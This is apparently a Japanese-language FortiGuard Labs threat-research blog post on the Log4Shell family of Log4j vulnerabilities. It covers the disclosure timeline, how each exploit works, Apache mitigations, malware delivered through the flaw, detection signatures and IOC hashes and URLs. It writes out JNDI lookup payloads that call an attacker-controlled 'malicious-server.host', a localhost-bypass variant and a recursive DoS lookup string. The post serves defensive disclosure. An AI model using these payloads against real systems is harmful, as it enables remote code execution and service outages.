脅威リサーチ

重大なApache Log4j(Log4Shell)の脆弱性に関する最新情報:知っておくべきこと

投稿者 Shunichi Imano, James Slaughter, および Gergely Revay | 2021年12月28日

FortiGuard Labs Threat Research Report

影響を受けるプラットフォーム: 脆弱なLog4jバージョンを使用しているすべてのアプリケーションとサービス
影響を受ける対象:       脆弱なLog4jバージョンを使用しているすべての組織
影響:             リモートの攻撃者による脆弱なシステムの乗っ取り
深刻度:            クリティカル

このブログはPaolo Di Prodi、Arturo Erick Torres Cavazosの協力により作成されました。

12月9日以降、インターネットに接続されている環境のほとんどは、無数のサーバーに導入されているApache Log4jフレームワークで発見された重大な新しい脆弱性に対処することを余儀なくされました。この脆弱性は、正式名CVE-2021-44228ですが通称「Log4Shell」と呼ばれ、簡単に悪用できるとともに、標的となったシステム上で無制限のリモートコード実行を可能にします。結果として、この脆弱性には最大値である10というCVSSスコアが付与されました。

12月14日に、Apache Software Foundationは2つ目のLog4j脆弱性(CVE-2021-45046)を公表しました。この脆弱性は当初、サービス拒否(DoS)につながる脆弱性と判定され、CVSSスコアは3.7で深刻度はモデレートでした。しかし、12月16日に事態はさらに悪化しました。この脆弱性を悪用することで、情報漏洩とリモートコード実行が可能になることが明らかになったのです。結果として、Apacheはアドバイザリを更新して、この脆弱性のCVSSスコアを9.0に引き上げました。

12月18日には、3つ目のLog4j脆弱性(CVE-2021-45105)が発見されました。この脆弱性の内容は、Apache Log4j2がルックアップ評価時の無限再帰を防止できない場合があるというものです。この修正は、Log4jをサービス拒否(DoS)攻撃に悪用されやすくする新たに発見された脆弱性に対処するために公開されました。

12月19日には、CVE-2021-44228のエクスプロイトコードを取り入れたMirai IoTマルウェアの「ワーム型」とされる亜種が発見されました。OSINTチャネル上のさまざまなチャターで、これが「ワーム」であるかどうか議論されています。

このブログでは、これらのApache Log4jの脆弱性について知っておくべきことを解説します。これには、詳細情報、Log4jに関連するキャンペーン、「ワーム型」と疑われているMiraiマルウェア亜種などの情報が含まれています。

Log4jの機能と重要性

Log4jは、世界中のアプリケーションやサービスで幅広く使用されているJavaベースの拡張可能なロギングフレームワークです(関連ソフトウェアのCISAリスト )。多くの場合、Log4jへの依存性は2層から3層の深さになります(依存性の依存性)。Log4jが幅広く普及していることが、CVE-2021-44228の危険性を大きくしている一因となっています。iCloud、Steam、Minecraftなどの数百ものアプリケーションがロギングのためにLog4jを使用しています。攻撃者は、標的のアプリケーションに特殊な文字列をロギングさせるだけで、この脆弱性を悪用できます。

Log4jフレームワークは、JNDI(Java Naming and Directory Interface)へのインタフェースを提供します。JNDIを使用すると、LDAP(Lightweight Directory Access Protocol)のような外部ディレクトリサービスに接続できます。これにより、実環境で現在確認されているいくつかの攻撃試行のベースが形成されて、低セキュリティのJNDIルックアップを通じて無許可の遠隔攻撃者が任意のコードを実行可能になるリスクが生じます。

興味深いことに、CVE-2021-44228を悪用している初期エクスプロイトは、このパッチの公開前に作成されていたようです。Cloudflareによると、このエクスプロイトは、当パッチ公開9日前の12月1日に早くも発見されていました。もう1つの重要な情報として、Minecraftは、最初に攻撃されたサーバーの1つであったため、この問題を浮き彫りにする炭鉱のカナリアの役割を果たしました。

状況

11月24日に、AlibabaのCloud Security Teamは、Log4jに含まれている重大な脆弱性をApache Software Foundationに報告しました。これを受けてApacheは、この脆弱性に対処するためのリリース候補版を12月6日に公開しましたが、AlibabaのCloud Security Teamはこれを不十分と見なしました。Apacheによって必要な更新が加えられる前の12月9日に投稿されたツイートでは、Log4j内でJNDIのルックアップを悪用することで、リモートコード実行が可能になることがほのめかされました。この投稿は、セキュリティとハッカーの両コミュニティで大きな混乱を招いたようです。

翌日にApacheは、Log4j 2.15.0を公式な修正版として公開しました。この頃、攻撃者は、脆弱なマシンを狙って標的を探し始めました。同日、CISAは公表したアドバイザリを通じて、できる限り早期にLog4jを2.15.0にアップグレードするようにユーザーと管理者に呼びかけました。このアドバイザリの後に、この問題を詳述したApache Log4jの脆弱性に関するガイダンスのページが公開されました。

その後SANSは、2017年に発生した悪名高いWannaCryのアウトブレイク以来初めてInfoconアラートを黄色に移行しました。Infoconアラートの目的は、不正トラフィックの変化と接続中断の可能性を反映すること、およびインターネットインフラストラクチャの状態を適用することです。Infoconが過去に黄色ステータスに引き上げられたのは、HeartbleedやShellshock(どちらも2014年)などの重大インシデントの場合に限られていることからも、Log4Shellがどれほど深刻なのかが分かります。

12月14日に状況は悪化して、Apacheは前回公開した修正が不十分であったためにLog4j 2.16.0を公開しました。この2つ目の脆弱性(CVE-2021-45046、CVSSスコア3.7)は、攻撃が成功した場合にサービス拒否(DoS)状態を引き起こします。攻撃者は直ちにLog4Shellを悪用しました。そのために、新しいマルウェアと有害な可能性のあるプログラム(PUAs)を投入して、脆弱なマシンを侵害しようとしました。

12月16日に、ApacheはCVE-2021-45046のCVSSスコアを3.7から9.0に引き上げました。さらなる調査の結果として、攻撃が成功すると、一部の環境で情報漏洩とリモートコード実行が発生するリスクがあり、すべての環境でローカルコード実行が発生するリスクがあることが分かりました。深刻度はモデレートからクリティカルに引き上げられました。

新たなLog4j脆弱性に対処するために、12月18日にLog4jバージョン2.17.0が公開されました。この最新のセキュリティホール(CVE-2021-45105)は、サービス拒否につながる脆弱性であり、CVSSスコアは7.5で、Apacheによって「高」と指定されました。

このエクスプロイトの仕組み:CVE-2021-44228

  1. 攻撃者は、標的を選択すると、Log4jによってログに記録される可能性の高いフィールド内で、その標的に対する接続要求にJNDIクエリを追加します。例: 「${jndi:ldap://malicious-server.host/aaa}
  2. 脆弱なバージョンのLog4はその要求を受け取って、LDAPクエリを通じて「malicious-server.host」と通信しようとします。
  3. この接続に成功すると、攻撃者の管理下にある「malicious-server.host」は、不正なJavaクラスファイルロケーションをディレクトリデータ内に挿入することで、このクエリに応答します。
  4. 標的上のJava実装によって、この不正なJavaクラスファイルがダウンロードされて実行されます。

リモートコード実行エクスプロイトの仕組み:CVE-2021-45046

  1. 攻撃者は、標的を選択すると、Log4jによってログに記録される可能性の高いフィールド内で、その標的に対する接続要求にJNDIクエリを追加します。Log3j 2.15.0内のCVE-2021-44228向けの修正が適用されたために、リモートJNDIクエリはデフォルトでは許可されなくなりました。したがって、たとえば次の要求を使用してこの制限を回避できます:「${jndi:ldap://127.0.0.1#malicious-server.host/aaa}」
  2. 「#」の前にローカルホストが記述されているため、バージョン2.15.0のLog4jではこの要求は有効と見なされますが、Log4jフレームワークでは、この文字列全体が解決されて、LDAPクエリを通じて「malicious-server.host」との通信が試行されます。
  3. この接続に成功すると、攻撃者の管理下にある「malicious-server.host」は、不正なJavaクラスファイルロケーションをディレクトリデータ内に挿入することで、このクエリに応答します。
  4. 標的上のJava実装によって、この不正なJavaクラスファイルがダウンロードされて実行されます。

サービス拒否(DoS)エクスプロイトの仕組み:CVE-2021-45105

この脆弱性はLog4Shellの一部として見なされていません。攻撃者はルックアップコマンドに関する知識と制御権を必要とするため、この攻撃の実行はさらに複雑になります(スレッドコンテキストマップなどが使用されます)。この脆弱性は無限再帰であるため、エクスプロイトに成功すると、サービス拒否(DoS)攻撃が発生します。

  1. この脆弱性を悪用するためには、脆弱な(または不正な)アプリケーションはカスタムパターンレイアウトを持つコンテキストマップルックアップを使用する必要があります。
  2. 次の結果が引き起こされるように、ログ行が巧妙に作成されます。すなわち、このログ行がトリガーされると、無限ループ状態が発生して、リソースが枯渇してサービスが拒否されることが企図されます。

例:logger.info("Example log line {}", "${${::-${::-$${::-j}}}}");

CVE-2021-44228とCVE-2021-45046を悪用する攻撃の増大

FortiGuard Labsは、両方のCVEをカバーしている我々のIPSシグネチャ(Apache.Log4j.Error.Log.Remote.Code.Execution)を使用した攻撃の検知件数が、12月15日まで着実に増加していることを確認しました。

図1:12月10日以降のApache.Log4j.Error.Log.Remote.Code.Executionの検知件数

脆弱なLog4jバージョン

  • CVE-2021-44228:2.0-beta9から2.12.1までおよび2.13.0から2.14.1まで(2.15.0-rc1も含む)のすべてのLog4jバージョンは脆弱です。
  • CVE-2021-45046:2.0-beta9から2.15.0までのLog4jバージョン
  • CVE-2021-45105:2.0-beta9から2.16.0までのLog4jバージョン

これらの脆弱性にパッチは適用されていますか?

はい、Java 8以降のユーザーはできる限り早急にLog4j 2.17.0に更新することが推奨されます。ただし、2.15.0で提供された修正が不完全であったため、Apacheは後続のLog4jバージョン2.16.0と2.17.0を公開しました。ユーザーはこれらのバージョンを適用することが強く推奨されます。

Java 7については、ユーザーは2.12.2にアップグレードすることが推奨されます。

ベンダーから減災策が提供されましたか?

はい、Apacheからは、Log4Shell(CVE-2021-44228)に対する次の減災情報が提供されています。

Log4j 1.xの減災:Log4j 1.xにはルックアップ機能がないため、リスクは低めです。Log4j 1.xを使用しているアプリケーションがこの攻撃に対して脆弱となるのは、構成でJNDIを使用しているときだけです。この脆弱性について、別個のCVE(CVE-2021-4104)が申請されました。減災方法:ロギング構成を調べて、JMSAppenderが設定されていないことを確認します。この脆弱性は、JMSAppenderが使用されていないLog4j 1.xの構成には影響を与えません。

Log4j 2.xの減災:以下の減災策のいずれかを適用してください。

Java 8(以降)のユーザーはリリース2.16.0にアップグレードすることが推奨されます。
Java 7を必要とするユーザーは、リリース2.12.2(公開され次第)にアップグレードすることが推奨されます(現在開発中であり、近いうちに公開予定です)。

上記以外の場合は、JndiLookupクラスをクラスパスから削除してください:zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class

この脆弱性はlog4j-core JARファイルのみに影響を与えます。log4j-core JARファイルを使用せずにlog4j-api JARのみを使用しているアプリケーションは、この脆弱性の影響を受けません。

ApacheからCVE-2021-45046に対する次の減災情報が提供されています。

Log4j 1.xの減災
Log4j 1.xはこの脆弱性の影響を受けません。

Log4j 2.xの減災
以下の減災策のいずれかを適用してください。

Java 8(以降)のユーザーはリリース2.16.0にアップグレードすることが推奨されます。
Java 7のユーザーはリリース2.12.2にアップグレードすることが推奨されます。
上記以外の場合は、2.16.0以外のリリースでは、JndiLookupクラスをクラスパスから削除して構いません:zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class
ユーザーはLog4j 2.16.0でJNDIを有効化しないことが推奨されます。JMS Appenderが必要な場合は、Log4j 2.12.2を使用してください。

この脆弱性はlog4j-core JARファイルのみに影響を与えます。log4j-core JARファイルを使用せずにlog4j-api JARのみを使用しているアプリケーションは、この脆弱性の影響を受けません。

また、Apache Log4jは、この脆弱性の影響を受ける唯一のロギングサービスサブプロジェクトです。この脆弱性は、Log4netやLog4cxxのような他のプロジェクトには影響を与えません。

ApacheからCVE-2021-45105に対する次の減災情報が提供されています。

Log4j 1.xの減災
Log4j 1.xはこの脆弱性の影響を受けません。

Log4j 2.xの減災
以下の減災策のいずれかを適用してください。

Java 8(以降)のユーザーはリリース2.17.0にアップグレードすることが推奨されます。代わりの方法として、これを構成内で減災できます。

ロギング構成内のPatternLayoutで、${ctx:loginId}や$${ctx:loginId}のようなコンテキストルックアップをスレッドコンテキストマップパターン(%X、%mdc、または%MDC)に置き換えてください。

上記以外の場合は、構成内で、${ctx:loginId}や$${ctx:loginId}のようなコンテキストルックアップへの参照を削除してください(これらの出所がHTTPヘッダーやユーザー入力などのアプリケーション外部のソースである場合)。

この脆弱性はlog4j-core JARファイルのみに影響を与えます。log4j-core JARファイルを使用せずにlog4j-api JARのみを使用しているアプリケーションは、この脆弱性の影響を受けません。

また、Apache Log4jは、この脆弱性の影響を受ける唯一のロギングサービスサブプロジェクトです。この脆弱性は、Log4netやLog4cxxのような他のプロジェクトには影響を与えません。

フォーティネットはエクスプロイトの試行から守ってくれますか?

はい。フォーティネットが公開した「Apache.Log4j.Error.Log.Remote.Code.Execution」(VID 51006)というIPSシグネチャは、CVE-2021-44228とCVE-2021-45046の両方に対するエクスプロイトの試行をブロックします。このシグネチャは、IPSパッケージバージョン19.215で初期公開されました。FortiGuard Labsは、CVE-2021-45105に対処するための「Apache.Log4j.Error.Log.Thread.Context.DoS」というIPSシグネチャを提供しています。

Log4Shellを悪用した攻撃を通じて、どのようなマルウェアと有害な可能性のあるアプリケーション(PUA:Potentially Unwanted Application)が投入されたことが確認されていますか?

各種のマルウェア(Khonsariランサムウェア、Kinsing、Mirai、Muhstik、Elknot、m8220、Orcus RAT、XMRig、SitesLoader、Nanocore RATなど)が、これらの後続攻撃で投入されたことが報告されています。また、この脆弱性を悪用することで、Minecraftサーバー上で3DシューティングゲームのDoomを実行できることを示す動画が投稿されました。

以下では、それぞれのマルウェアタイプを簡単に説明しています。

Khonsariランサムウェア

Khonsariは、侵入先マシン上の特定フォルダ内のファイルを暗号化して、それらのファイルの暗号化解除と引き換えに金銭を要求するランサムウェアです。Khonsariという名称の由来は、このランサムウェアによって暗号化されるファイルには.khonsariという拡張子が付加されるからです。

Kinsing

Kinsingは、Go言語で記述されたマルウェアであり、暗号通貨マイナーを実行して、侵入先の環境内で拡散しようとします。Kinsingが登場したのは2020年1月頃です。

図2:92.242.40.21からペイロードをダウンロード中のKinsingドロッパー

Mirai

Miraiは、Linuxを標的にするマルチアーキテクチャ型マルウェアです。Miraiは当初、公開されているネットワークデバイスに投入されていましたが、現在ではIoTデバイスに対して使用されることが増えています。感染すると、侵入先のデバイスはボットネット(ボットの集合)に吸収されたボットになります。これらのボットネットは主に分散型サービス拒否(DDoS)攻撃に使用されます。

図3:「nazi.uy」というドメインがMiraiの侵害指標

FortiGuard Labsは、Miraiマルウェアに関する下記のブログを以前に投稿しています。

Elknot

このマルウェアはBillGatesとも呼ばれ、当初はLinuxのみを標的としていました。しかしその後、Windowsに移植されました。このマルウェアは、分散型サービス拒否(DDoS)攻撃を仕掛けるために使用されます。

図4:関数名付きのElknotバイナリ。CAttackCompressが主に使用される攻撃コマンド

m8220

m8220は、WindowsとLinuxのプラットフォームを標的とするマイニングボットネットです。

図5:M8220は、ユーザーのフォルダとbash履歴を解析してユーザー名、パスワード、SSH鍵を入手することで、SSHを通じて拡散しようとします。

Muhstik

Muhstikは、侵入先のマシンをボット化するLinuxマルウェアであり、脆弱性を悪用して拡散することが知られています。Muhstikによって悪用される代表的な脆弱性の1つは、Atlassian.Confluence.CVE-2021-26084.Remote.Code.Execution(CVE-2021-26084)です。

FortiGuard Labsは、Muhkstikに関する下記のブログを以前に投稿しています。

Orcus RAT

Orcusは、少なくとも2016年から地下フォーラムで盛んに宣伝されて販売されてきたリモートアクセス型トロイの木馬(RAT:Remote Access Trojan)です。2019年に、カナダのソフトウェア開発企業がこのRATを作成して販売した罪で検挙されましたが、ソースコードが漏洩したために、Orcus RATは現在も使用されています。このマルウェアはRATとして、コマンド&コントロール(C&C)サーバーから受信したコマンドを通じて、侵入先のマシン上でさまざまな操作を実行します。

SitesLoader

下記のシェルスクリプトドロッパーは、UPXで圧縮されたGoバイナリをhxxp://103[.]104.73.155:8080/indexからダウンロードします。このバイナリはXMRig暗号通貨マイナーでもあります。

図6:103.104.73.155からXMRigマイナーをダウンロード中のSitesLoaderドロッパー

XMRig

XMRigは、Monero暗号通貨をマイニングするために使用されるオープンソースの暗号通貨マイニングソフトウェアです。XMRigは正規ソフトウェアですが、侵入先のマシンでMoneroを不法にマイニングするために攻撃者によって悪用されることが多いです。

図7:xmrig.exeのダウンロードと実行

Nanocore RAT

Nanocoreは、2013年に登場したモジュール式のリモートアクセス型トロイの木馬(RAT)です。このRATは以前は販売されていて、クラッキングされたバージョンがオンラインで漏洩しました。Nanocoreは、侵入先のマシンで一般的なRAT活動を行います。たとえば、データ窃取、キーロギング、Webカメラの乗っ取り、スクリーンショットの撮影などです。

拡散のために最近のLog4jエクスプロイトを取り入れたマルウェアはありますか?

FortiGuard Labsは、Miraiの亜種がLog4Shellの脆弱性を悪用してワームとして拡散するというオンラインレポートを確認しました。

FortiGuard Labsで行った分析の結論は、このMirai亜種はLog4Shellエクスプロイトを備えており、Huawei製HG532ルーター内のリモートコード実行脆弱性(CVE-2017-17215)を悪用するものの、ワームのような機能は発揮しないというものです。

したがって、FortiGuard Labsの調査結果ではこれがワームのように拡散できることが明らかになりましたが、ボットマスターがすべての命令を制御しているため、これはワームではありません。その理由は、このMirai亜種は拡散と命令について外部リソースに依存しているからです。ボットマスターはスキャンをオンまたはオフにすることもできます。

FortiGuard Labsは、このMirai亜種をアンチウイルスによってELF/Mirai.VI!trとして検知しました。

FortiGuard Labsは、CVE-2017-17215に対処するためのIPSシグネチャ「Huawei.HG532.Remote.Code.Execution」を提供しています。

FortiEDRについては、すべての既知のサンプルがFortiGuard Labsのクラウドインテリジェンスに追加されており、これらのサンプルは実行された場合にブロックされます。

フォーティネットは最近のLog4j脆弱性に関する資料を公開していますか?

はい、この問題が明るみに出て以降に、フォーティネットはいくつかの資料を公開しています。公開済みの資料は次のとおりです。

結論

Log4jの脆弱性は、Wannacry、Heartbleed、Shellshockなどの過去の主な脅威と同じように世界中に多大な影響をもたらしました。Log4jは幅広く導入されているため、多くのエンタープライズ向けアプリケーションとクラウドサービスの更新が必要となります。したがって、Log4jの脆弱性の余波はしばらく続くと予想されます。世界では、Log4jの脆弱性を悪用した大規模なマルウェア配信事象(大規模なランサムウェアアウトブレイクやワーム化し得る事象など)はまだ発生していませんが、油断は禁物であることを歴史が教えてくれています。特に、攻撃者が一般に活発化する年末期が近付いていることからも、気を引き締める必要があります。

FortiGuard Labsは、引き続き状況を積極的に監視して実態を深く理解して、防御措置に関する追加情報を得られ次第提供していきます。

フォーティネットのソリューションと減災策

FortiGuard Labsは、CVE-2021-44228(Log4Shell)、CVE-2021-45046、CVE-2021-45105に対処するための以下のIPSシグネチャを提供しています。

Apache.Log4j.Error.Log.Remote.Code.Execution(CVE-2021-44228とCVE-2021-45046)
Apache.Log4j.Error.Log.Thread.Context.DoS(CVE-2021-45105)

アウトブレイクアラートにアクセスして、フォーティネットがLog4Shellからユーザーを保護する方法に関する詳細情報をご参照ください。

FortiGuard Labsは、マルウェア、有害な可能性のあるプログラム(PUP:Potentially Unwanted Program、PUA:Potentially Unwanted Application)、その他の関連ファイルに対するアンチウイルス防御策を提供しています。

MSIL/Filecoder.ANF!tr.ransom (Khonsari ransomware)
BASH/CoinMiner.RZ!tr (kinsing)
ELF/CoinMiner.CFA!tr (kinsing)
ELF/Ganiw.A!tr (Elknot)
Linux/Mirai.B!tr.bdr (Mirai)
Linux/Tsunami.NCD!tr (Mirai)
Adware/Tsunami (Mirai)
ELF/DDoS.CIA!tr (Muhstik)
BASH/Miner.BO!tr.dldr (m8220)
Java/khonsari.DF40!tr (Orcus RAT)
BASH/Miner.UF!tr (SitesLoader)
Adware/Miner (SitesLoader)
BASH/Agent.ACA8!tr.dldr
Riskware/CoinMiner.PO (XMRig)
Riskware/CVE202144228 (XMRig)BAT/Agent.Q!tr.dldr (XMRig)
W32/GenKryptik.FBSU!tr (Nanocore RAT)

すべてのネットワークIOCはWebFilteringクライアントによってブロックされます。

また、FortiGuard Labsは、Log4Shellを通じて配信される旧マルウェア亜種に対する以下のアンチウイルス防御策も提供しています。

Kinsing
BASH/Agent.KG!tr
BASH/CoinMiner.AKT!tr
BASH/Miner.DB!tr
W64/CoinMiner.QG!tr
BASH/CoinMiner.RZ!tr

Mirai
ELF/Mirai.[random alphabets]
ELF/Mirai.[random alphabets]!tr
Linux/Mirai[random alphabets]!tr

Elknot
Linux/Elknot.[random alphabets]!tr
ELF/Elknot.[radom alphabets]!tr

Orcus RAT
W32/OrcusRAT.[random alphabets]
W32/Orcus.[random alphabets]!tr
W32/Orcus.[random alphabets]!tr.bdr

Muhstik
ELF/DDoS.CIA!tr
BASH/Agent.MQ!tr
Adware/Tsunami
ELF/CoinMiner.CFA!tr
ELF/BitCoinMiner.HF!tr
BAT/Starter.NZ!tr
BASH/CoinMiner.RZ!tr

XMRig
W32/XMRigMiner
Riskware/XMRig_Miner
W32/XMRig_Miner.[random alphabets]!tr
Riskware/XMRigCoinMiner
W32/XMRig_Miner.[random alphabets]
Linux/XMrig.[random alphabets]!tr.dldr
MSIL/XMRig_Miner.VC!tr
W32/XMRigMiner.WIN64!tr
W64/XMRigMiner.WIN64!tr
W32/XMRig_Miner.ELF64!tr
W32/XMRig_Miner.SMBM4!tr

Nanocore RAT
W32/Backdoor_MSIL_NANOCORE.BA!tr
W32/NANOCORE.[random alphabets]!tr.bdr
W32/NanoCore.[random alphabets and numbers]!tr
Data/Nanocore.[random alphabets!tr
W32/Backdoor_MSIL_NANOCORE.SMIL
MSIL/NanoCore.[Random alphabets and numbers]!tr
Adware/NanoCore
Adware/Backdoor_MSIL_NANOCORE

Apacheは、上記のとおり旧バージョンのユーザー向けに減災アドバイスも提供しています。

 

IOC(Indicators of Compromise:侵害指標)

SHA-256 Hash
f2e3f685256e5f31b05fc9f9ca470f527d7fdae28fa3190c8eba179473e20789 (Khonsari ransomware)
6e25ad03103a1a972b78c642bac09060fa79c460011dc5748cbb433cc459938b (Kinsing)
7e9663f87255ae2ff78eb882efe8736431368f341849fec000543f027bdb4512 (Kinsing)
8933820cf2769f6e7f1a711e188f551c3d5d3843c52167a34ab8d6eabb0a63ef (Kinsing)
bcfdddb033fb1fa9c73e222919ecd4be071e87b0c54825af516b4f336bc47fa2 (Elknot)
0e574fd30e806fe4298b3cbccb8d1089454f42f52892f87554325cb352646049 (Mirai)
19370ef36f43904a57a667839727c09c50d5e94df43b9cfb3183ba766c4eae3d (Mirai)
2a4e636c4077b493868ea696db3be864126d1066cdc95131f522a4c9f5fb3fec (Mirai)
15e7942ebf88a51346d3a5975bb1c2d87996799e6255db9e92aed798d279b36b (Muhstik)
10fad59b071db09aafcb7f40e775f28180aed182786557e9ee7f2f2e332b4513 (m8220)
86fc70d24f79a34c46ef66112ef4756639fcad2f2d7288e0eeb0448ffab90428 (Orcus RAT)
e7c5b3de93a3184dc99c98c7f45e6ff5f6881b15d4a56c144e2e53e96dcc0e82 (SitesLoader)
f059246cea87a886acb1938809cf4a1152247a5b5a2df0b1bf64c46a0daccbcc (SitesLoader)
3e6567dab5e7c7c42a02ac47e8c68f61c9c481bbbbe5ddb1c68e86f7370dab45 (XMRig)
95ac2e2cd2caf30829a9588988601067a98f9bb02e0776a8ef2b813f9b4d8992 (XMRig)
e8b2a8d0c3444c53f143d0b4ba87c23dd1b58b03fd0a6b1bcd6e8358e57807f1 (XMRig)
bd5006ba4e4cfcf8a8b0b6da5bb30f4dd8a78beb351b814431ae8599dcf23f1b (Nanocore RAT)
e9744244461056c64fc390591729c035f3a375bc8ecfa1a0c111defa055c1273 (Mirai variant with alleged worm capability)

URL
3[.]145.115.94/zambo/groenhuyzen[.]exe
3[.]145.115.94/zambos_caldo_de_p.txt
hxxp://3[.]145.115.94/main.class
hxxp://45[.]137.155.55/kinsing
hxxp://45[.]137.155.55/kinsing2
hxxp://80[.]71.158.12/kinsing
hxxp://80[.]71.158.44/kinsing
hxxp://82[.]118.18.201/kinsing
hxxp://92[.]242.40.21/kinsing
hxxp://93[.]189.42.8/kinsing
hxxp://92[.]242.40.21/lh2.sh
hxxp://45[.]137.155.55/ex.sh
hxxp://155[.]94.154.170/aaa
hxxp://138[.]197.206.223/wp-content/themes/twentysixteen/dk86
hxxp://34[.]221.40.237/.x/pty5
hxxp://34[.]221.40.237/.x/pty9
nazi[.]uy
hxxp://agent[.]apacheorg.xyz:1234/v
hxxp://185[.]250.148.157:8005/index
hxxp://103[.]104.73.155:8080/acc
hxxp://129[.]226.180.53/xmrig_setup/raw/master/setup_c3pool_miner.sh
hxxp://download[.]c3pool.com/xmrig_setup/raw/master/setup_c3pool_miner.sh
hxxp://54[.]210.230.186/wp-content/themes/twentyfourteen/xmrig.exe
hxxp://198[.]98.60.67/bins/x86
hxxp://198.98.60.67/bins/arm
hxxp://198.98.60.67/lh.sh